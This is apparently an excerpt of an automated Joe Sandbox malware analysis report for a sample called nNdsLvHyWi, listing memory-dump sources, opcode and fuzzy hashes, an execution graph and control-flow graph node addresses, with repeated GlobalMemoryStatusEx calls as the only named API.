                                          • Opcode ID: 5382c399fd2f81c4261c62627aab0d07df7ced378bc9b46c2f6d9a958f97e2a4
                                          • Instruction ID: cdd6dc62e6a492c77c0eac387037e9e0633d42997bd96ac6dc17cb6728773ad9
                                          • Opcode Fuzzy Hash: 5382c399fd2f81c4261c62627aab0d07df7ced378bc9b46c2f6d9a958f97e2a4
                                          • Instruction Fuzzy Hash: F7E04834D0420CEBC748EF50F8055ADBB79AB46311F105158D8451B260CB705E55D7A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5547dd50568ed65caf61be896765270716f2a2883c9056ec3584ff6c3b4b5237
                                          • Instruction ID: f96a9c0b1db2d3c864c83aa1816eb09761dd9ec85e5bba65bb2cbeade40e6b8f
                                          • Opcode Fuzzy Hash: 5547dd50568ed65caf61be896765270716f2a2883c9056ec3584ff6c3b4b5237
                                          • Instruction Fuzzy Hash: C0E0E538D04208EFCB84DFA9E448A9CBBB4FF48300F1081AAE8495B320D7719E54DF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 278cb15adffb8679d6a9feac2b74410a1b596cb79b476f6449022edbb6ea3e53
                                          • Instruction ID: 8d3314738c3d78fda7890716dac86d19558a5ece309e4c3cffb69344d3ef0d24
                                          • Opcode Fuzzy Hash: 278cb15adffb8679d6a9feac2b74410a1b596cb79b476f6449022edbb6ea3e53
                                          • Instruction Fuzzy Hash: 7AE0E5B4E08208EFDB84DFA8E4456ACBBF5EB88200F10C1A9984897350D7759A42CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 878fb0c6fd2638fce21932384b892a6eed8a71379f24fefe93cff400752eef21
                                          • Instruction ID: fa6ae532a4abf2be27b4ee5c739aa7adefaef147c971409e5690e9756f703f23
                                          • Opcode Fuzzy Hash: 878fb0c6fd2638fce21932384b892a6eed8a71379f24fefe93cff400752eef21
                                          • Instruction Fuzzy Hash: 90E0C2B185510CFBC780DFA5E80069E77FCEB09200F0009A5D1059B110EBB08A14D792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d643379a268db6ef426c4ebc40292dba39b0c19a0d90f8a6b1c78b74f0c8177
                                          • Instruction ID: 7fe6d8796086949a65dae22049c4291226e108f5b27ccbd3026104bd158e5eae
                                          • Opcode Fuzzy Hash: 1d643379a268db6ef426c4ebc40292dba39b0c19a0d90f8a6b1c78b74f0c8177
                                          • Instruction Fuzzy Hash: 11E0C2B181424CEFCB40DFE0E81969D7BFCEB49201F1056A5D5098B120EFB14A10D782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 899bd6bd9a2edb0d75c1d952aff88a0d2bbdc0270069c338d8abeba56cacc0c9
                                          • Instruction ID: e3e94b7535b3fb09e0f6731fadc34ca7fb848b51f183c0b44e6242d1e278998b
                                          • Opcode Fuzzy Hash: 899bd6bd9a2edb0d75c1d952aff88a0d2bbdc0270069c338d8abeba56cacc0c9
                                          • Instruction Fuzzy Hash: 71E0EC74D59218EFC784EFA8E54969CBBB4AB08201F1001AAC949D7350E7745B54CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a2037e15be5d5f04be0db24e6c247e3fcc3871133c6b3e104b29ed56f67bc3c
                                          • Instruction ID: 0e3c63dbc82e8c580f7b3b368b1ccdf2bfdc64c315207ae4c971e54b2ae8d3f3
                                          • Opcode Fuzzy Hash: 5a2037e15be5d5f04be0db24e6c247e3fcc3871133c6b3e104b29ed56f67bc3c
                                          • Instruction Fuzzy Hash: E0E08C74A08208EFC744DFD4F54566CBBB8AB86300F1081EC88081B340CB719E42CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89d7740060ee4b1f718d6d1e3fd8753d718f94e253b44b0401070de36773bc0f
                                          • Instruction ID: 3f8733e9ed9233511ed8edc3d6576046decb888249719aa38a87b66ab03d8f12
                                          • Opcode Fuzzy Hash: 89d7740060ee4b1f718d6d1e3fd8753d718f94e253b44b0401070de36773bc0f
                                          • Instruction Fuzzy Hash: 83E09A70901219CFEB64DF15ED58BDA7BB1BB48301F004699D40DA6250C7B91E81CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a6c2b9e5170fa177f0b5d7e6d55c674ed40f5dea736d8824f4c259586116dcd
                                          • Instruction ID: 6bf77606dad0749a1e8b0d14ba281f11ba0b135ddebb7b92f087b864ec86f9db
                                          • Opcode Fuzzy Hash: 6a6c2b9e5170fa177f0b5d7e6d55c674ed40f5dea736d8824f4c259586116dcd
                                          • Instruction Fuzzy Hash: 65B0927A258640A6B1842AA85C45EAA7861AFA1B04B00A80523881006489A0E664D15F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:12.5%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:40
                                          Total number of Limit Nodes:5
                                          execution_graph 24118 de0848 24120 de084e 24118->24120 24119 de091b 24120->24119 24123 de1383 24120->24123 24130 de1490 24120->24130 24125 de1396 24123->24125 24124 de1488 24124->24120 24125->24124 24126 de1490 2 API calls 24125->24126 24138 de7d48 24125->24138 24142 de7eb8 24125->24142 24149 de7da0 24125->24149 24126->24125 24132 de1396 24130->24132 24133 de1497 24130->24133 24131 de1488 24131->24120 24132->24131 24134 de7eb8 2 API calls 24132->24134 24135 de7d48 2 API calls 24132->24135 24136 de7da0 2 API calls 24132->24136 24137 de1490 2 API calls 24132->24137 24133->24120 24134->24132 24135->24132 24136->24132 24137->24132 24140 de7db6 24138->24140 24139 de7f22 24139->24125 24140->24139 24153 def4c7 24140->24153 24143 de7ec2 24142->24143 24144 de7edc 24143->24144 24145 65bfab8 2 API calls 24143->24145 24146 65bfaa8 2 API calls 24143->24146 24147 de7f22 24144->24147 24148 def4c7 2 API calls 24144->24148 24145->24144 24146->24144 24147->24125 24148->24147 24151 de7db6 24149->24151 24150 de7f22 24150->24125 24151->24150 24152 def4c7 2 API calls 24151->24152 24152->24150 24154 def4d2 24153->24154 24158 65bfab8 24154->24158 24162 65bfaa8 24154->24162 24155 def4d9 24155->24139 24159 65bfacd 24158->24159 24160 65bfce2 24159->24160 24161 65bfcf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24159->24161 24160->24155 24161->24159 24164 65bfacd 24162->24164 24163 65bfce2 24163->24155 24164->24163 24165 65bfcf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24164->24165 24165->24164

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 65b55e0-65b55fd 98 65b55ff-65b5602 97->98 99 65b5628-65b562b 98->99 100 65b5604-65b5623 98->100 101 65b562d-65b5630 99->101 102 65b5635-65b5638 99->102 100->99 101->102 104 65b563a-65b5649 102->104 105 65b564e-65b5651 102->105 104->105 106 65b565d-65b5660 105->106 107 65b5653-65b565c 105->107 108 65b567a-65b567d 106->108 109 65b5662-65b566c 106->109 112 65b567f-65b5681 108->112 113 65b5684-65b5687 108->113 114 65b5673-65b5675 109->114 112->113 115 65b5689-65b568f 113->115 116 65b56bf-65b56c2 113->116 114->108 117 65b57af-65b57db 115->117 118 65b5695-65b569d 115->118 119 65b56d1-65b56d4 116->119 120 65b56c4-65b56ca 116->120 131 65b57e5-65b57e8 117->131 118->117 121 65b56a3-65b56b0 118->121 123 65b56e2-65b56e5 119->123 124 65b56d6-65b56dd 119->124 120->115 122 65b56cc 120->122 121->117 128 65b56b6-65b56ba 121->128 122->119 125 65b56f9-65b56fc 123->125 126 65b56e7-65b56f4 123->126 124->123 125->120 129 65b56fe-65b5701 125->129 126->125 128->116 132 65b570b-65b570e 129->132 133 65b5703-65b5706 129->133 134 65b57ea-65b57f4 131->134 135 65b57f9-65b57fc 131->135 136 65b5710-65b5711 132->136 137 65b5716-65b5719 132->137 133->132 134->135 138 65b581e-65b5821 135->138 139 65b57fe-65b5802 135->139 136->137 140 65b571b-65b572d 137->140 141 65b5732-65b5735 137->141 145 65b5843-65b5846 138->145 146 65b5823-65b5827 138->146 143 65b5808-65b5810 139->143 144 65b58d6-65b5914 139->144 140->141 147 65b5752-65b5755 141->147 148 65b5737-65b574d 141->148 143->144 151 65b5816-65b5819 143->151 168 65b5916-65b5919 144->168 154 65b5848-65b584c 145->154 155 65b5864-65b5867 145->155 146->144 153 65b582d-65b5835 146->153 149 65b576e-65b5774 147->149 150 65b5757-65b575a 147->150 148->147 149->109 162 65b577a 149->162 157 65b5769-65b576c 150->157 158 65b575c-65b5762 150->158 151->138 153->144 163 65b583b-65b583e 153->163 154->144 156 65b5852-65b585a 154->156 159 65b5869-65b587a 155->159 160 65b587f-65b5882 155->160 156->144 165 65b585c-65b585f 156->165 157->149 167 65b577f-65b5782 157->167 158->133 166 65b5764 158->166 159->160 169 65b5892-65b5895 160->169 170 65b5884-65b588b 160->170 162->167 163->145 165->155 166->157 174 65b578f-65b5791 167->174 175 65b5784-65b5788 167->175 172 65b591f-65b5ab3 168->172 173 65b5c02-65b5c05 168->173 178 65b58af-65b58b2 169->178 179 65b5897-65b589b 169->179 176 65b58ce-65b58d5 170->176 177 65b588d 170->177 246 65b5ab9-65b5ac0 172->246 247 65b5bec-65b5bff 172->247 173->172 180 65b5c0b-65b5c0e 173->180 183 65b5798-65b579b 174->183 184 65b5793 174->184 181 65b578a 175->181 182 65b57a1-65b57ae 175->182 177->169 186 65b58bc-65b58be 178->186 187 65b58b4-65b58bb 178->187 179->144 185 65b589d-65b58a5 179->185 190 65b5c18-65b5c1b 180->190 191 65b5c10-65b5c15 180->191 181->174 183->98 183->182 184->183 185->144 193 65b58a7-65b58aa 185->193 188 65b58c0 186->188 189 65b58c5-65b58c8 186->189 188->189 189->131 189->176 194 65b5c1d-65b5c30 190->194 195 65b5c33-65b5c36 190->195 191->190 193->178 195->172 196 65b5c3c-65b5c3f 195->196 199 65b5c59-65b5c5c 196->199 200 65b5c41-65b5c52 196->200 201 65b5c6a-65b5c6d 199->201 202 65b5c5e-65b5c65 199->202 200->202 209 65b5c54 200->209 204 65b5c6f-65b5c80 201->204 205 65b5c87-65b5c8a 201->205 202->201 204->194 217 65b5c82 204->217 207 65b5c8c-65b5c9d 205->207 208 65b5ca4-65b5ca7 205->208 207->202 221 65b5c9f 207->221 212 65b5ca9-65b5cba 208->212 213 65b5cc1-65b5cc4 208->213 209->199 212->207 223 65b5cbc 212->223 215 65b5cde-65b5ce1 213->215 216 65b5cc6-65b5cd7 213->216 219 65b5cef-65b5cf1 215->219 220 65b5ce3-65b5cea 215->220 216->202 228 65b5cd9 216->228 217->205 226 65b5cf8-65b5cfb 219->226 227 65b5cf3 219->227 220->219 221->208 223->213 226->168 229 65b5d01-65b5d0a 226->229 227->226 228->215 248 65b5ac6-65b5af9 246->248 249 65b5b74-65b5b7b 246->249 260 65b5afb 248->260 261 65b5afe-65b5b3f 248->261 249->247 251 65b5b7d-65b5bb0 249->251 262 65b5bb2 251->262 263 65b5bb5-65b5be2 251->263 260->261 271 65b5b41-65b5b52 261->271 272 65b5b57-65b5b5e 261->272 262->263 263->229 271->229 274 65b5b66-65b5b68 272->274 274->229
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $
                                          • API String ID: 0-3993045852
                                          • Opcode ID: b9b3a32fcf6afde0049303668fe7563a6fd583c980450f1b82e2bd7b609e453f
                                          • Instruction ID: 31580ca9899fe9ea31b7ae936fdde2abc64e666546d59ea30825aaa8a6389534
                                          • Opcode Fuzzy Hash: b9b3a32fcf6afde0049303668fe7563a6fd583c980450f1b82e2bd7b609e453f
                                          • Instruction Fuzzy Hash: 3F22A231F002199FDF68DFA4C4906EEBBB2FF85310F248469E505AB285EA75DD46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf3c1c55fe8a1c44d08067aea080dd61f32f601831d3f5efdea5c9a2345bc4ee
                                          • Instruction ID: 8727b5f49452aa5d37e24562ae7ddeb8f0267876751ae30d8d35dc72739ed9ec
                                          • Opcode Fuzzy Hash: cf3c1c55fe8a1c44d08067aea080dd61f32f601831d3f5efdea5c9a2345bc4ee
                                          • Instruction Fuzzy Hash: 1C924734A00204CFDB64DB68C584AADB7F2FB49310F5594A9D409EB3A1DB75ED82CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4391d60b2e95dc1f1bee4743b98ad6c7b1cb00e0fb0fec1de6703018ba0b3e7f
                                          • Instruction ID: 09c0b4ad63627a04e07b0b5242c9f541af320ae57e557b2913c3b4f02617ea04
                                          • Opcode Fuzzy Hash: 4391d60b2e95dc1f1bee4743b98ad6c7b1cb00e0fb0fec1de6703018ba0b3e7f
                                          • Instruction Fuzzy Hash: 77628B34A00209CFDB54EB68D980AADB7B2FF89310F149469E506AB391DB75ED46CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1531 65bc1f0-65bc210 1532 65bc212-65bc215 1531->1532 1533 65bc23e-65bc241 1532->1533 1534 65bc217-65bc239 1532->1534 1535 65bc259-65bc25c 1533->1535 1536 65bc243-65bc254 1533->1536 1534->1533 1538 65bc288-65bc28b 1535->1538 1539 65bc25e-65bc283 1535->1539 1536->1535 1540 65bc2ab-65bc2ae 1538->1540 1541 65bc28d-65bc2a6 1538->1541 1539->1538 1544 65bc4b3-65bc4bc 1540->1544 1545 65bc2b4-65bc2b7 1540->1545 1541->1540 1547 65bc32f-65bc338 1544->1547 1548 65bc4c2 1544->1548 1550 65bc2b9-65bc2dd 1545->1550 1551 65bc2e2-65bc2e5 1545->1551 1557 65bc33e-65bc342 1547->1557 1558 65bc587-65bc5bd 1547->1558 1556 65bc4c7-65bc4ca 1548->1556 1550->1551 1553 65bc2e7-65bc2ee 1551->1553 1554 65bc2f5-65bc2f8 1551->1554 1559 65bc2fa-65bc2fd 1553->1559 1560 65bc2f0 1553->1560 1554->1559 1561 65bc302-65bc305 1554->1561 1562 65bc4cc-65bc4d5 1556->1562 1563 65bc4e7-65bc4ea 1556->1563 1565 65bc347-65bc34a 1557->1565 1578 65bc5bf-65bc5c2 1558->1578 1559->1561 1560->1554 1568 65bc30f-65bc312 1561->1568 1569 65bc307-65bc30c 1561->1569 1562->1558 1570 65bc4db-65bc4e2 1562->1570 1571 65bc4ec-65bc4f2 1563->1571 1572 65bc4f7-65bc4fa 1563->1572 1573 65bc34c-65bc355 1565->1573 1574 65bc360-65bc363 1565->1574 1579 65bc32a-65bc32d 1568->1579 1580 65bc314-65bc325 1568->1580 1569->1568 1570->1563 1571->1572 1581 65bc4fc-65bc520 1572->1581 1582 65bc525-65bc528 1572->1582 1573->1562 1575 65bc35b 1573->1575 1576 65bc370-65bc373 1574->1576 1577 65bc365-65bc36b 1574->1577 1575->1574 1584 65bc393-65bc396 1576->1584 1585 65bc375-65bc38e 1576->1585 1577->1576 1588 65bc5ee-65bc5f1 1578->1588 1589 65bc5c4-65bc5dd 1578->1589 1579->1547 1579->1565 1580->1579 1581->1582 1586 65bc53a-65bc53d 1582->1586 1587 65bc52a-65bc535 1582->1587 1590 65bc398-65bc3b1 1584->1590 1591 65bc3b6-65bc3b9 1584->1591 1585->1584 1592 65bc53f-65bc558 1586->1592 1593 65bc55d-65bc560 1586->1593 1587->1586 1595 65bc5f3-65bc60f 1588->1595 1596 65bc614-65bc617 1588->1596 1626 65bc5e3-65bc5ed 1589->1626 1627 65bc677-65bc683 1589->1627 1590->1591 1604 65bc3bb-65bc3ca 1591->1604 1605 65bc3d1-65bc3d4 1591->1605 1592->1593 1606 65bc56a-65bc56c 1593->1606 1607 65bc562-65bc567 1593->1607 1595->1596 1599 65bc619-65bc623 1596->1599 1600 65bc624-65bc627 1596->1600 1612 65bc629-65bc642 1600->1612 1613 65bc647-65bc64a 1600->1613 1635 65bc3cc 1604->1635 1636 65bc441-65bc444 1604->1636 1608 65bc3f7-65bc3fa 1605->1608 1609 65bc3d6-65bc3f2 1605->1609 1616 65bc56e 1606->1616 1617 65bc573-65bc576 1606->1617 1607->1606 1619 65bc3fc-65bc421 1608->1619 1620 65bc426-65bc429 1608->1620 1609->1608 1612->1613 1622 65bc64c-65bc65a 1613->1622 1623 65bc665-65bc667 1613->1623 1616->1617 1617->1532 1618 65bc57c-65bc586 1617->1618 1619->1620 1628 65bc42b-65bc42e 1620->1628 1629 65bc433-65bc436 1620->1629 1622->1589 1649 65bc660 1622->1649 1633 65bc669 1623->1633 1634 65bc66e-65bc671 1623->1634 1637 65bc689-65bc692 1627->1637 1638 65bc823-65bc82d 1627->1638 1628->1629 1629->1573 1640 65bc43c-65bc43f 1629->1640 1633->1634 1634->1578 1634->1627 1635->1605 1641 65bc449-65bc44c 1636->1641 1643 65bc698-65bc6b8 1637->1643 1644 65bc82e-65bc83c 1637->1644 1640->1636 1640->1641 1646 65bc4ae-65bc4b1 1641->1646 1647 65bc44e-65bc4a9 1641->1647 1662 65bc6be-65bc6c7 1643->1662 1663 65bc811-65bc81d 1643->1663 1655 65bc83e-65bc866 1644->1655 1656 65bc7d3-65bc7d5 1644->1656 1646->1544 1646->1556 1647->1646 1649->1623 1661 65bc868-65bc86b 1655->1661 1658 65bc7e3 1656->1658 1659 65bc7d7-65bc7e1 1656->1659 1664 65bc7e8-65bc7ea 1658->1664 1659->1664 1665 65bc871-65bc87f 1661->1665 1666 65bca27-65bca2a 1661->1666 1662->1644 1667 65bc6cd-65bc6fc call 65b65d8 1662->1667 1663->1637 1663->1638 1668 65bc7ff-65bc80b 1664->1668 1669 65bc7ec-65bc7f8 1664->1669 1675 65bc886-65bc888 1665->1675 1671 65bca4d-65bca4f 1666->1671 1672 65bca2c-65bca48 1666->1672 1693 65bc73e-65bc754 1667->1693 1694 65bc6fe-65bc736 1667->1694 1668->1662 1668->1663 1669->1668 1673 65bca51 1671->1673 1674 65bca56-65bca59 1671->1674 1672->1671 1673->1674 1674->1661 1676 65bca5f-65bca68 1674->1676 1681 65bc88a-65bc88d 1675->1681 1682 65bc89f-65bc8c9 1675->1682 1681->1676 1691 65bc8cf-65bc8d8 1682->1691 1692 65bca1c-65bca26 1682->1692 1696 65bc8de-65bc9ed call 65b65d8 1691->1696 1697 65bc9f5-65bca1a 1691->1697 1702 65bc772-65bc788 1693->1702 1703 65bc756-65bc76a 1693->1703 1694->1693 1696->1691 1740 65bc9f3 1696->1740 1697->1676 1709 65bc78a-65bc79e 1702->1709 1710 65bc7a6-65bc7b9 1702->1710 1703->1702 1709->1710 1716 65bc7bb-65bc7c5 1710->1716 1717 65bc7c7 1710->1717 1720 65bc7cc-65bc7ce 1716->1720 1717->1720 1720->1668 1721 65bc7d0 1720->1721 1721->1656 1740->1692
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc1d81c3620b34c9e0345e15d73a5983932d20cb8ce5b74f235f64c11f03b9d8
                                          • Instruction ID: bec0545f2c03e8a71fb913b204cc9c9c9f4ba5943dd75e9e4d843de63512724d
                                          • Opcode Fuzzy Hash: dc1d81c3620b34c9e0345e15d73a5983932d20cb8ce5b74f235f64c11f03b9d8
                                          • Instruction Fuzzy Hash: EE327034B001068FDB54EB68D890BAEBBB2FB89310F119529E505EB395DB75EC42CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67b59917aff8bca90ef4e63b6f0dd77a241cfb8f01047b61b5bd9e5a1128f597
                                          • Instruction ID: ffeda4fbde1818c3f4838bd02926fd6bfddc31da8648c811b360ed836bec304c
                                          • Opcode Fuzzy Hash: 67b59917aff8bca90ef4e63b6f0dd77a241cfb8f01047b61b5bd9e5a1128f597
                                          • Instruction Fuzzy Hash: 06224D30E101099BEF64DBA8D8907EDBBA2FB85310F259425E409EB391DEB5DD81CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49594c945743e4510ee5eab92c43011f098843da1e3118c418d36916e140947a
                                          • Instruction ID: 0c9b6d08222a685a3908e0d0e9831fe9faadff5acbad3969d637c4492fb2b363
                                          • Opcode Fuzzy Hash: 49594c945743e4510ee5eab92c43011f098843da1e3118c418d36916e140947a
                                          • Instruction Fuzzy Hash: 11322B31E1061ACBCB54EF75C85059DB7B2FFC9300F6596A9D409BB254EF70AA85CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c8eeb6cae3a306037774ef275cd14eed85aa04abd973972b3e9f204f202a8b8b
                                          • Instruction ID: 285204094a74235d3c2314df6ec3b619d4c3c4b7b6c729553e2a125d84b16ceb
                                          • Opcode Fuzzy Hash: c8eeb6cae3a306037774ef275cd14eed85aa04abd973972b3e9f204f202a8b8b
                                          • Instruction Fuzzy Hash: DB028E30B01206CFDB58EF68D8507AEB7A6FF88300F259569E505AB395DB75EC42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 275 deec10-deec18 276 deec1a-deec1c 275->276 277 deebd7-deebf0 call deec10 275->277 278 deec1e-deec2b 276->278 279 deebca 276->279 283 deebf6-deebfa 277->283 281 deec2d-deec54 278->281 282 deec55-deec6b 278->282 279->277 307 deec6d call deecf8 282->307 308 deec6d call deec10 282->308 286 deebfc-deec01 283->286 287 deec03-deec06 283->287 288 deec09-deec0b 286->288 287->288 289 deec72-deec74 290 deec7a-deecd9 289->290 291 deec76-deec79 289->291 298 deecdf-deed6c GlobalMemoryStatusEx 290->298 299 deecdb-deecde 290->299 303 deed6e-deed74 298->303 304 deed75-deed9d 298->304 303->304 307->289 308->289
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4530677615.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_de0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5dbe1ed925def0147e397191beea6faf00e9d80aec17e528c0d01dd49063a603
                                          • Instruction ID: afde8b3ab2619f83dc807145e9d1c66831063f8a9b3bafd5ae853b8eeb91bedb
                                          • Opcode Fuzzy Hash: 5dbe1ed925def0147e397191beea6faf00e9d80aec17e528c0d01dd49063a603
                                          • Instruction Fuzzy Hash: 04512331904399AFC710DF6AD8046EABBF9AFCA310F18856AE905A7241DB749844C7F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 310 deecf8-deed6c GlobalMemoryStatusEx 312 deed6e-deed74 310->312 313 deed75-deed9d 310->313 312->313
                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE ref: 00DEED5F
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4530677615.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_de0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          • Opcode ID: ef24981819fb56bf84b65637ccf5769b41327d7acd6052b2b3f4fe6248a61e2e
                                          • Instruction ID: 84235573bd8bcfa53d5f0407ef3c8a6e67e78ff28323ee86f9cf1cb3ac59f5b8
                                          • Opcode Fuzzy Hash: ef24981819fb56bf84b65637ccf5769b41327d7acd6052b2b3f4fe6248a61e2e
                                          • Instruction Fuzzy Hash: 5A1114B1C0065A9BCB10DF9AC44479EFBF4AF48720F14812AD918A7240D778A950CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
